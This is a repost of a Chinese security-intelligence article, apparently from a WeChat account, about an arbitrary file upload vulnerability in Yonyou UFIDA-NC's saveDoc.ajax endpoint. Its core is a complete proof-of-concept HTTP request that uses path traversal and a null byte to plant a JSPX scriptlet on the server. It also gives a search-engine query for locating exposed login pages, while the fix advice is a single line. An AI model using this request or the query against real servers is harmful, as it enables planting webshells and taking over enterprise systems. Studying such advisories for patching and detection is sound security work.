声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,禁止私自转载,如需转载,请联系作者!!!!
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!!!!!
漏洞介绍
用友-UFIDA-NC saveDoc.ajax 存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
影响版本
用友-UFIDA-NC漏洞情报
搜索引擎语法
title="产品登录界面"POC
POST /uapws/saveDoc.ajax?ws=/../../test.jspx%00 HTTP/1.1Host: xxxxAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 666content=<hi xmlns:hi="http://java.sun.com/JSP/Page"><hi:directive.page import="java.util.*,java.io.*,java.net.*"/><hi:scriptlet>out.println("test!");new java.io.File(application.getRealPath(request.getServletPath())).delete();</hi:scriptlet></hi>
修复建议
建议及时更新至最新版本或者使用WAF安全设备防护!关注我们
原文始发于微信公众号(极星信安):安全情报,X友 UFIDA-NC saveDoc.ajax 存在文件上传漏洞!!!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论